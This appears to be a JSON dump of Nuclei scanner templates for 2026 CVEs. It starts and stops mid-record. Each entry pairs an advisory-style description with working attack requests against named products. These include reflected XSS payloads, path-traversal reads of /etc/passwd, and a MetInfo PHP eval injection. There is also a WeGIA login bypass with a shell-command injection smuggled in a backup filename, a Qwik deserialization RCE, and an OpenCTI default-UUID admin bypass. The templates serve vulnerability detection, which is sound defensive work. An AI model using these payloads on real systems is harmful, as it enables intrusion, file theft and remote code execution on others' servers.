4a0a0047304502202bdc158209aba557ee62ed1f8075291a4f0db05fcadc8133980da50ae88f641d022100939020990753ac141d8cce5b79e62750fd5b477694c18e82f56911b3beb74c01:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-29962.yaml","vuln_id":"cve-2026-29962"},{"raw":"id: CVE-2026-29183\n\ninfo:\n  name: SiYuan Note - Cross-Site Scripting\n  author: ritikchaddha\n  severity: medium\n  description: |\n    Unauthenticated reflected cross-site scripting (XSS) vulnerability in all versions of SiYuan Note containing `/api/icon/getDynamicIcon` with unsafe `type=8` rendering logic. Attacker-controlled `content` is inserted directly into SVG output without proper sanitization. An attacker can execute arbitrary JavaScript in users' browsers when they visit a crafted malicious link.\n  remediation: |\n    Upgrade to SiYuan version 3.5.9 or later, which properly sanitizes SVG content.\n  impact: |\n    Successful exploitation allows arbitrary JavaScript execution in the SiYuan web origin. Attackers can abuse authenticated API actions and exfiltrate sensitive data if a privileged session is active.\n  reference:\n    - https://github.com/siyuan-note/siyuan/security/advisories/GHSA-6865-qjcf-286f\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-29183\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n    cvss-score: 6.1\n    cve-id: CVE-2026-29183\n    epss-score: 0.00625\n    epss-percentile: 0.48617\n    cwe-id: CWE-79\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: siyuan-note\n    product: siyuan\n    shodan-query: http.favicon.hash:-1450125239\n  tags: cve,cve2026,siyuan,xss,svg\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/icon/getDynamicIcon?type=8&content=%3C%2Ftext%3E<script>alert(document.domain)</script><text%3E\"\n      - \"{{BaseURL}}/api/icon/getDynamicIcon?type=8&content=%3C%2Ftext%3E%3Cimage%20href%3Dx%20onerror%3Dalert(document.domain)%3E%3C%2Fimage%3E%3Ctext%3E\"\n\n    stop-at-first-match: true\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '<script>alert(document.domain)</script>'\n          - '</text><image href=\"x\" onerror=\"alert(document.domain)\">'\n        condition: or\n\n      - type: word\n        part: body\n        words:\n          - 'id=\"dynamic_icon_type8'\n\n      - type: word\n        part: content_type\n        words:\n          - \"image/svg+xml\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022016f99408ede3463aed031ec75d9cee80f2eeba6b18644550d30b8149469fa1ad022100ed580d4e80ffc94631c807192690ba489c41a89eb08d6999d797c175e3987164:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-29183.yaml","vuln_id":"cve-2026-29183"},{"raw":"id: CVE-2026-29066\n\ninfo:\n  name: TinaCMS - Path Traversal\n  author: theamanrawat\n  severity: medium\n  description: |\n    TinaCMS CLI < 2.1.8 contains a file system read vulnerability caused by disabled Vite server.fs.strict setting, letting unauthenticated attackers read arbitrary files on the host system, exploit requires access to the dev server.\n  impact: |\n    Unauthenticated attackers can read arbitrary files on the host system, potentially exposing sensitive information.\n  remediation: |\n    Update to version 2.1.8 or later.\n  reference:\n    - https://github.com/tinacms/tinacms/security/advisories/GHSA-m48g-4wr2-j2h6\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-29066\n  classification:\n    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 6.2\n    cve-id: CVE-2026-29066\n    epss-score: 0.01025\n    epss-percentile: 0.62081\n    cwe-id: CWE-200\n  metadata:\n    verified: true\n    max-requests: 3\n    vendor: tinacms\n    product: tinacms\n    shodan-query: http.title:\"TinaCMS\"\n    fofa-query: body=\"TinaCMS\" || body=\"tinacms\"\n  tags: cve,cve2026,tinacms,lfi,vuln,unauthenticated\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}\"\n\n    host-redirects: true\n    max-redirects: 3\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"tina-tailwind\"\n        internal: true\n\n      - type: status\n        status:\n          - 200\n        internal: true\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/etc/passwd\"\n\n    host-redirects: true\n    max-redirects: 3\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"root:x:0:0\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100b9b867f2f419bbf702b515e63aa95098cc48bc6354e62aa9d38ae72005d9cb9f022050bdc94446015c82fbffd2e62fb8392e76103b92f4213967cd96de4e8bb87acf:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-29066.yaml","vuln_id":"cve-2026-29066"},{"raw":"id: CVE-2026-29059\n\ninfo:\n  name: Windmill/Nextcloud Flow < 1.603.3 - Unauthenticated Path Traversal\n  author: 0x_Akoko\n  severity: critical\n  description: |\n    Windmill < 1.603.3 contains a path traversal caused by unsanitized filename parameter in get_log_file endpoint, letting unauthenticated attackers read arbitrary files on the server, exploit requires no authentication.\n  impact: |\n    Unauthenticated attackers can read arbitrary files on the server, potentially exposing sensitive information.\n  remediation: |\n    Update to version 1.603.3 or later.\n  reference:\n    - https://github.com/Chocapikk/Windfall\n    - https://chocapikk.com/posts/2026/windfall-nextcloud-flow-windmill-rce/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-29059\n  classification:\n    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H\n    cvss-score: 10.0\n    cve-id: CVE-2026-29059\n    epss-score: 0.02945\n    epss-percentile: 0.8655\n    cwe-id: CWE-22\n  metadata:\n    max-request: 4\n    vendor: windmill\n    product: windmill\n    verified: true\n    shodan-query: http.html:\"Windmill\" http.html:\"svelte-global-loader\"\n    fofa-query: app=\"Windmill\"\n  tags: cve,cve2026,windmill,nextcloud,lfi,unauth,vkev\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/w/_/jobs_u/get_log_file/..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd\"\n      - \"{{BaseURL}}/api/w/_/jobs_u/get_log_file/..%2F..%2F..%2F..%2Fetc%2Fpasswd\"\n      - \"{{BaseURL}}/index.php/apps/app_api/proxy/flow/api/w/_/jobs_u/get_log_file/..%25252F..%25252F..%25252F..%25252F..%25252F..%25252Fetc%25252Fpasswd\"\n      - \"{{BaseURL}}/index.php/apps/app_api/proxy/flow/api/w/_/jobs_u/get_log_file/..%25252F..%25252F..%25252F..%25252Fetc%25252Fpasswd\"\n\n    stop-at-first-match: true\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"root:x:0:0:\"\n\n      - type: word\n        part: body\n        words:\n          - \"<!DOCTYPE\"\n          - \"Err:\"\n        condition: or\n        negative: true\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a004730450220496f3828615dee2006f011488144abbc9c9a273ac8023a995079cd77b1592bde022100a439390faf2fd1c912fffc7ecdb08f9c3c6e03cee9bbe3483ef64ca64129d215:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-29059.yaml","vuln_id":"cve-2026-29059"},{"raw":"id: CVE-2026-29014\n\ninfo:\n  name: MetInfo CMS <= 8.1 - Remote Code Execution\n  author: 0x_Akoko\n  severity: critical\n  description: |\n   MetInfo CMS 7.9, 8.0, and 8.1 contain an unauthenticated PHP code injection vulnerability caused by insufficient input neutralization in the execution path, letting remote attackers execute arbitrary code remotely, exploit requires crafted requests.\n  impact: |\n   Remote attackers can execute arbitrary code, gaining full control over the affected server.\n  remediation: |\n   Update to the latest version beyond 8.1.\n  reference:\n    - https://karmainsecurity.com/KIS-2026-06\n    - https://www.metinfo.cn\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-29014\n  classification:\n    cve-id: CVE-2026-29014\n    epss-score: 0.3949\n    epss-percentile: 0.98545\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cwe-id: CWE-94\n  metadata:\n    max-request: 3\n    verified: true\n    shodan-query: http.title:\"MetInfo\"\n    fofa-query: app=\"MetInfo\"\n  tags: cve,cve2026,metinfo,rce,php,vkev\n\nvariables:\n  num1: \"{{rand_int(800000, 999999)}}\"\n  num2: \"{{rand_int(800000, 999999)}}\"\n  result: \"{{to_number(num1)*to_number(num2)}}\"\n\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_all(body, \"MetInfo\", \"mituo\")'\n          - 'status_code == 200'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /app/system/entrance.php?n=include&m=module&c=weixin&a=doapi HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/xml\n\n        <x><MsgType>event</MsgType><Event>SCAN</Event><EventKey>adminlogin&#x26;../config/tables</EventKey><FromUserName>{${eval(base64_decode($_SERVER[chr(72).chr(84).chr(84).chr(80).chr(95).chr(67)]))}}.{${die()}}</FromUserName></x>\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"success\")'\n          - 'status_code == 200'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /app/system/entrance.php?n=include&m=module&c=weixin&a=doapi HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/xml\n        C: {{base64(\"echo {{num1}}*{{num2}};die();\")}}\n\n        <x><MsgType>event</MsgType><Event>SCAN</Event><EventKey>adminlogin&#x26;Array</EventKey></x>\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(content_type, \"text/html\")'\n          - 'contains(body, \"{{result}}\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 490a0046304402207e59a5403b6a1ed8b234e9b88a4d60a10f8f24726f365290914757b36d7f2cbb02204753c40cdbdbb24ac71f6951306502d968520d9132f53504584123c5819b445c:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-29014.yaml","vuln_id":"cve-2026-29014"},{"raw":"id: CVE-2026-28496\n\ninfo:\n  name: FOSSBilling - Server-Side Template Injection\n  author: DhiyaneshDK\n  severity: critical\n  description: |\n    A Server-Side Template Injection (SSTI) vulnerability exists in FOSSBilling's template rendering system. Administrators with access to features that render Twig templates (email templates, mass mail campaigns, custom payment adapters, and the string_render API endpoint) can inject arbitrary Twig expressions, leading to information disclosure and remote code execution. The vulnerability exists because Twig templates are rendered without a sandbox, allowing access to the full Twig environment, API context, and the application's dependency injection container.\n  impact: |\n    Administrators can execute arbitrary code and disclose sensitive information, potentially compromising the entire system.\n  remediation: |\n    Upgrade to version 0.8.0 or later.\n  reference:\n    - https://www.vulncheck.com/blog/fossbilling-auth-bypass-ssti-rce\n    - https://github.com/FOSSBilling/FOSSBilling/security/advisories/GHSA-57mv-jm88-66jc\n    - https://x.com/pyn3rd/status/2069260345571696951\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: html:\"FOSSBilling\"\n  tags: cve,cve2026,ssti,rce,sqli,fossbilling,vkev\n\nhttp:\n  - raw:\n      - |\n        POST /api/system/system/string_render HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"_tpl\":\"{{ guest.getDi().db.getCell(\\\"SELECT @@version\\\") }}\",\"_try\":false}\n\n    skip-variables-check: true\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"[0-9]+\\\\.[0-9]+\\\\.[0-9]+\"\n          - '{\"result\":\"'\n        condition: and\n\n      - type: word\n        part: content_type\n        words:\n          - \"application/json\"\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: regex\n        part: body\n        regex:\n          - \"[0-9]+\\\\.[0-9]+\\\\.[0-9]+[\\\\-a-zA-Z0-9]*\"\n# digest: 4a0a0047304502207311a0e1ebdd716f6a81c0f4d492b4ea6dd7dd111bef5cbd4dca09c2568f8b9c02210092e85389def43f9a51da3a4d5266ccedd6ab7240bb66655f21c43d1f82c3d4ca:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-28496.yaml","vuln_id":"cve-2026-28496"},{"raw":"id: CVE-2026-28414\n\ninfo:\n  name: Gradio - Absolute Path Traversal\n  author: 0x_Akoko\n  severity: high\n  description: |\n   Gradio < 6.7 on Windows with Python 3.13+ contains an absolute path traversal caused by incorrect path validation in path joining logic, letting unauthenticated attackers read arbitrary files from the server.\n  impact: |\n   Unauthenticated attackers can read arbitrary files on the server, potentially exposing sensitive information.\n  remediation: |\n   Upgrade to version 6.7 or later.\n  reference:\n    - https://github.com/gradio-app/gradio/security/advisories/GHSA-39mp-8hj3-5c49\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-28414\n  classification:\n    cve-id: CVE-2026-28414\n    epss-score: 0.03098\n    epss-percentile: 0.87168\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cwe-id: CWE-36\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: gradio-app\n    product: gradio\n    shodan-query: 'http.title:\"Gradio\"'\n    fofa-query: 'title=\"Gradio\" || body=\"gradio-app\"'\n  tags: cve,cve2026,gradio,lfi,traversal,unauth,windows,vkev\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n        Accept: text/html\n\n    matchers:\n      - type: dsl\n        internal: true\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(to_lower(body), \"window.gradio_config\", \"__gradio_mode__\")'\n        condition: and\n\n  - raw:\n      - |\n        GET /static//windows/win.ini HTTP/1.1\n        Host: {{Hostname}}\n        Accept: */*\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"text/plain\")'\n          - 'contains_all(to_lower(body), \"[fonts]\", \"[extensions]\")'\n        condition: and\n# digest: 490a00463044022022f8287665f046cc84edab5525f4e1e671a1b2bac6b49690a152bcad0f85bef70220417ccff65c630b9042f8131aa55c8032869bb03c093cd349f2bf984e8be9d275:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-28414.yaml","vuln_id":"cve-2026-28414"},{"raw":"id: CVE-2026-28411\n\ninfo:\n  name: WeGIA < 3.6.5 - Unauthenticated Authentication Bypass via extract()\n  author: str4k3r,0x_Akoko\n  severity: critical\n  description: |\n    WeGIA < 3.6.5 contains an authentication bypass caused by unsafe use of extract() on $_REQUEST, letting unauthenticated attackers bypass authentication and access protected areas, exploit requires no authentication.\n  impact: |\n    Unauthenticated attackers can bypass authentication and gain unauthorized administrative access.\n  remediation: |\n    Upgrade to version 3.6.5 or later.\n  reference:\n    - https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-jg7w-3wg7-4vhh\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-28411\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-28411\n    epss-score: 0.02316\n    epss-percentile: 0.8268\n    cwe-id: CWE-287\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: labredescefetrj\n    product: wegia\n    shodan-query: http.html:\"WeGIA\"\n    fofa-query: body=\"WeGIA\"\n  tags: cve,cve2026,wegia,auth-bypass,extract,unauth\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        POST /WeGIA/html/login.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        cpf=admin&c=true&id_pessoa=1\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 302'\n          - 'contains(header, \"PHPSESSID\")'\n          - 'contains(header, \"home.php\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: sessid\n        part: header\n        group: 1\n        regex:\n          - '(?i)Set-Cookie:\\s*(PHPSESSID=[^;]+)'\n        internal: true\n\n  - raw:\n      - |\n        GET /WeGIA/html/home.php HTTP/1.1\n        Host: {{Hostname}}\n        Cookie: {{sessid}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_any(tolower(body), \"wegia\", \"menu\", \"processo\", \"funcionario\")'\n          - '!contains_any(tolower(body), \"login\", \"cpf\", \"senha\")'\n        condition: and\n# digest: 490a0046304402206a27f50f10de0aa5ea540ab76d755cb01db5c7633f602e78ca5e0e5e09cd04e902201adfb11e0bdcfec766c61a1ad7c5ea2bdd9f9f461f0b39c61952fe39186f7091:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-28411.yaml","vuln_id":"cve-2026-28411"},{"raw":"id: CVE-2026-28409\n\ninfo:\n  name: WeGIA <= 3.6.4 - Remote Code Execution\n  author: 0x_Akoko\n  severity: critical\n  description: |\n    WeGIA <= 3.6.5 contains a remote code execution caused by improper validation of backup file names in the database restoration functionality, letting attackers with administrative access execute arbitrary OS commands\n  impact: |\n    Attackers with admin access can execute arbitrary OS commands, potentially leading to full server compromise.\n  remediation: |\n    Upgrade to version 3.6.5 or later.\n  reference:\n    - https://cxsecurity.com/issue/WLB-2026030009\n    - https://github.com/LabRedesCefetRJ/WeGIA\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-28409\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n    cvss-score: 10.0\n    cve-id: CVE-2026-28409\n    epss-score: 0.03315\n    epss-percentile: 0.8803\n    cwe-id: CWE-78\n  metadata:\n    verified: true\n    max-request: 4\n    vendor: labredescefetRJ\n    product: wegia\n    shodan-query: http.html:\"WeGIA\"\n    fofa-query: body=\"WeGIA\"\n  tags: cve,cve2026,wegia,rce,vkev\n\nvariables:\n  filename: \"{{to_lower(rand_text_alpha(8))}}\"\n\nflow: http(1) && http(2) && http(3) && http(4)\n\nhttp:\n  - raw:\n      - |\n        POST /WeGIA/html/login.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        c=true&cpf=admin&id_pessoa=1\n\n    extractors:\n      - type: regex\n        name: session\n        part: header\n        group: 1\n        regex:\n          - 'PHPSESSID=([a-zA-Z0-9]+)'\n        internal: true\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n        internal: true\n\n  - raw:\n      - |\n        POST /WeGIA/html/configuracao/importar_dump.php HTTP/1.1\n        Host: {{Hostname}}\n        Cookie: PHPSESSID={{session}}\n        Content-Type: multipart/form-data; boundary=----test0boundary\n\n        ------test0boundary\n        Content-Disposition: form-data; name=\"usuario\"\n\n        1\n        ------test0boundary\n        Content-Disposition: form-data; name=\"id_pessoa\"\n\n        1\n        ------test0boundary\n        Content-Disposition: form-data; name=\"import\"; filename=\"dump;export F={{filename}};eval $(echo Y2F0IC9ldGMvcGFzc3dkID4gL3Zhci93d3cvaHRtbC9XZUdJQS8kRi50eHQ= | base64 -d);poc.dump.tar.gz\"\n        Content-Type: application/gzip\n\n        {{hex_decode(\"1f8b08000000000000030300000000000000000000\")}}\n        ------test0boundary--\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 302'\n        internal: true\n\n  - raw:\n      - |\n        GET /WeGIA/html/configuracao/gerenciar_backup.php?action=restore&file=dump%3Bexport+F%3D{{filename}}%3Beval+%24%28echo+Y2F0IC9ldGMvcGFzc3dkID4gL3Zhci93d3cvaHRtbC9XZUdJQS8kRi50eHQ%3D+%7C+base64+-d%29%3Bpoc.dump.tar.gz&usuario=1&id_pessoa=1 HTTP/1.1\n        Host: {{Hostname}}\n        Cookie: PHPSESSID={{session}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n        internal: true\n\n  - raw:\n      - |\n        GET /WeGIA/{{filename}}.txt HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"root:.*:0:0:\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100ed97936b7219e7035f92a8d52a6a212525f2cbb6ad74707397685a1eede3e0ae022100b7e630aba9778d4e28382b12d9e1b34ab8eada9517b4b02d51467efcdf22cad3:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-28409.yaml","vuln_id":"cve-2026-28409"},{"raw":"id: CVE-2026-28358\n\ninfo:\n  name: NocoDB - User Enumeration\n  author: DhiyaneshDk\n  severity: medium\n  description: |\n    NocoDB is software for building databases as spreadsheets. Prior to version 0.301.3, the password forgot endpoint returned different responses for registered and unregistered emails, allowing user enumeration. This issue has been patched in version 0.301.3.\n  impact: |\n    Attackers can enumerate registered users, potentially aiding further targeted attacks.\n  remediation: Update to version 0.301.3 or later.\n  reference:\n    - https://github.com/nocodb/nocodb/security/advisories/GHSA-387m-j3p9-3php\n    - https://github.com/nocodb/nocodb/releases/tag/0.301.3\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-28358\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2026-28358\n    cwe-id: CWE-204\n    epss-score: 0.00601\n    epss-percentile: 0.47452\n  metadata:\n    verified: false\n    max-request: 1\n    vendor: nocodb\n    product: nocodb\n    shodan-query: http.favicon.hash:-2017596142\n  tags: cve,cve2026,user-enum,nocodb\n\nvariables:\n  email: \"{{randstr}}@{{rand_base(5)}}.com\"\n\nhttp:\n  - raw:\n      - |\n        POST /api/v1/auth/password/forgot HTTP/1.1\n        Host: {{Hostname}}\n        Accept: application/json, text/plain, */*\n        Content-Type: application/json\n        Origin: {{RootURL}}\n        Referer: {{RootURL}}/forgot-password\n\n        {\"email\":\"{{email}}\"}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"Your email has not been registered\"\n\n      - type: word\n        part: content_type\n        words:\n          - \"application/json\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a0047304502201c646b509281bf5e22c4ebecd8665d5c8943b64f6a2bc9e199779b9bddc21f45022100cecac59e86560ae088bde037c22057572dcaa75364a6a9263607e4fd31a3346a:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-28358.yaml","vuln_id":"cve-2026-28358"},{"raw":"id: CVE-2026-28288\n\ninfo:\n  name: Dify User Enumeration via Observable Response Discrepancy\n  author: DhiyaneshDk\n  severity: medium\n  description: |\n    Dify is an open-source LLM app development platform. Prior to 1.9.0, responses from the Dify API to existing and non-existent accounts differ, allowing an attacker to enumerate email addresses registered with Dify. Version 1.9.0 fixes the issue.\n  impact: |\n    Attackers can enumerate registered email addresses, potentially aiding further targeted attacks or phishing.\n  remediation: |\n    Update to version 1.9.0 or later.\n  reference:\n    - https://github.com/langgenius/dify/security/advisories/GHSA-9qpf-wcv3-w3qx\n    - https://github.com/langgenius/dify/issues/24323\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2026-28288\n    epss-score: 0.00635\n    epss-percentile: 0.49059\n    cwe-id: CWE-204\n  metadata:\n    verified: true\n    max-request: 1\n  tags: cve,cve2026,dify,user-enum,info-leak\n\nhttp:\n  - raw:\n      - |\n        POST /console/api/login HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"email\":\"nonexistent{{randstr}}@example.com\",\"password\":\"{{randstr}}\",\"language\":\"en-US\",\"remember_me\":true}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"Account not found\"\n\n      - type: word\n        part: content_type\n        words:\n          - \"application/json\"\n\n      - type: status\n        status:\n          - 400\n# digest: 4b0a00483046022100a254ea33e15ee77ec0d47c81fcaec795915de8c94e5936e5a5155cfad1230c5e0221009ac9cb52934700569ce2cc93a84826e720fc5d88d5514e80ae533ac56f507df4:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-28288.yaml","vuln_id":"cve-2026-28288"},{"raw":"id: CVE-2026-28141\n\ninfo:\n  name: NextGEN Gallery <= 4.2.3 - Reflected Cross-Site Scripting\n  author: str4k3r\n  severity: high\n  description: |\n    NextGEN Gallery through 4.2.3 reflects a URL-decoded `ngg_tag` route value into the generated tag page without the context-specific escaping added in 4.2.4. An unauthenticated attacker can break out of the tag context and inject an auto-executing script. This template injects an `svg onload` payload carrying a random nonce and matches its unencoded reflection; slash and backtick syntax keep the request off common WAF signatures.\n  impact: |\n    An unauthenticated attacker can execute arbitrary JavaScript in a victim's browser when they open the crafted gallery-tag link, enabling session theft, credential capture, and actions performed as the victim.\n  remediation: |\n    Update NextGEN Gallery to version 4.2.4 or later.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-28141\n    - https://patchstack.com/database/wordpress/plugin/nextgen-gallery/vulnerability/wordpress-nextgen-gallery-plugin-4-2-3-cross-site-scripting-xss-vulnerability?_s_id=cve\n    - https://wordpress.org/plugins/nextgen-gallery/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L\n    cvss-score: 7.1\n    cve-id: CVE-2026-28141\n    epss-score: 0.00319\n    epss-percentile: 0.25052\n    cwe-id: CWE-79\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: imagely\n    product: nextgen-gallery\n    framework: wordpress\n    fofa-query: body=\"NextGEN Gallery\"\n    publicwww-query: \"/wp-content/plugins/nextgen-gallery/\"\n  tags: cve,cve2026,wordpress,wp-plugin,wp,nextgen-gallery,imagely,xss\n\nvariables:\n  marker: \"{{rand_base(6)}}\"\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/ngg_tag/cve-2026-28141%22%3E%3Csvg%2Fonload%3Dalert%60{{marker}}%60%3E/\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"<svg/onload=alert`{{marker}}`>\"\n          - \"NextGEN\"\n        condition: and\n\n      - type: word\n        part: header\n        words:\n          - \"text/html\"\n# digest: 4a0a00473045022100c13222cc4d81a1f2545c3adef90e30b97388619db5b1e8e41fd91eb028968d9e022046d512a1197b219e0ddf9cf22057f5394087221460bef8e7bd10d12e789ee864:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-28141.yaml","vuln_id":"cve-2026-28141"},{"raw":"id: CVE-2026-27971\n\ninfo:\n  name: Qwik - Unauthenticated RCE via server$ Deserialization\n  author: omarkurt\n  severity: critical\n  description: |\n    Qwik <=1.19.0 contains an insecure deserialization vulnerability in the server$ RPC mechanism, letting unauthenticated attackers execute arbitrary code remotely, exploit requires require() availability at runtime.\n  impact: |\n    Unauthenticated attackers can execute arbitrary code on the server, leading to full system compromise.\n  remediation: |\n    Update to version 1.19.1 or later.\n  reference:\n    - https://github.com/QwikDev/qwik/security/advisories/GHSA-p9x5-jp3h-96mm\n    - https://vulnerabletarget.com/VT-2026-27971\n  classification:\n    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N\n    cvss-score: 9.2\n    cve-id: CVE-2026-27971\n    epss-score: 0.05416\n    epss-percentile: 0.92338\n    cwe-id: CWE-502\n  metadata:\n    max-request: 1\n    verified: true\n    shodan-query: http.html:\"q:version\"\n    fofa-query: body=\"q:version\"\n  tags: cve,cve2026,qwik,rce,deserialization,vkev\n\nhttp:\n  - raw:\n      - |\n        POST /?qfunc=sync HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/qwik-json\n        X-QRL: sync\n        Origin: {{RootURL}}\n\n        {\"_objs\":[\"\\u0002./node_modules/cross-spawn/index#sync\",\"cat\",\"/etc/passwd\",[\"2\"],[\"0\",\"1\",\"3\"]],\"_entry\":\"4\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"regex('root:.*:0:0:', body)\"\n          - \"status_code == 200\"\n          - \"contains(header, 'application/qwik-json')\"\n        condition: and\n# digest: 4a0a0047304502201fd6a4074ce5600c59c09f414819b0d30139350da4a78d3ea635ab372acf53e0022100814172ecd53980dbb4a3083a5e10a85269a8d93094e8f776d5f08fd7927bc3bf:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-27971.yaml","vuln_id":"cve-2026-27971"},{"raw":"id: CVE-2026-27960\n\ninfo:\n  name: OpenCTI < 6.9.13 - Authentication Bypass via User Impersonation\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    OpenCTI < 6.9.13 allows authentication bypass by supplying a Bearer token set to the admin user's internal_id UUID instead of a valid JWT. The default admin internal_id (88ec0c6a-13ce-5e39-b486-354fe4a7084f) grants full admin access to the GraphQL API, effectively bypassing all authentication.\n  impact: |\n    An unauthenticated attacker can gain full admin access to the OpenCTI GraphQL API, including reading and modifying all threat intelligence data.\n  remediation: |\n    Upgrade OpenCTI to version 6.9.13 or later.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-27960\n    - https://www.pruva.dev/reproductions/REPRO-2026-00314\n    - https://www.pruva.dev/reproductions/REPRO-2026-00331\n  classification:\n    cvss-metrics: 